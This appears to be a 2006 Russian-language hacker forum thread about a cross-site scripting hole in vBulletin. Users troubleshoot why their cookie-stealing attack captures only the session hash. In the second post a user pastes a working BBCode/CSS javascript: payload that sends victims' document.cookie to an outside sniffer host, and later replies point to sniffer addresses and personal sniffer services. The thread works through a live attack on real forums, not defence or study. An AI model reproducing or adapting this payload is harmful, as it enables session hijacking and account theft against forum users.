Форумы Уязвимость в vBulletin. Или abbsessionhash вместо полных куков

Discussion in 'Уязвимости CMS/форумов' started by Smart12, 19 Jan 2006.

  1. Smart12

    Smart12 New Member

    Joined:
    19 Jan 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Использовал следующее:
    http://video.antichat.net/file105.html

    Проверка отработала, алерт вылазит.
    Запускаю оснолвную процедуру.....
    после перехода на искомый сайт создается файл в котором поидее должны лежать куки, а там лежит только bbsessionhash= значение и больше ничего.
    Попробовал прям из формы ПМ, в заголовок вставил искомый код, в алерте выдает полные куки. При отработке скрипта - только сессионхэш.
    В чем может быть причина? на заплатку не похоже, иначе проверки бы не работали.

    Спасибо.
     
  2. Electro

    Electro Elder - Старейшина

    Joined:
    23 Oct 2005
    Messages:
    243
    Likes Received:
    45
    Reputations:
    39
    А у меня другая проблема ...уже говорил сегодня в другой теме ... короче вставляю сплойт в форуме ..

    HTML:
    [EMAIL=[URL=s as=`[email protected]]mailto:[email protected] ]
    sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip	t:document.Images[1].src="htt"+"p"+":"+"/"+"/"+"antichat.org/s/Electro.gif?"+document.cookie)`
    алерт есть , сплойт не палиться но на сниффе пусто ...может я что нить не так сделал ? если да то буду блогодарен если подскажите...и еще я сижу под ИЕ! а не под оперой иль под файерфокс
     
  3. woolf

    woolf New Member

    Joined:
    23 Jan 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    у меня таже проблема что и у Smart12...
    помогите..
     
  4. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    интересно откуда ты это взял, адрес сниффера: antichat.ru/sniff/s.jpg вроде
     
  5. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    вообще-то на antichat.org можно зарегить персональный сниффер.. =) Так что все верно.
     
  6. Smart12

    Smart12 New Member

    Joined:
    19 Jan 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Может появились мысли?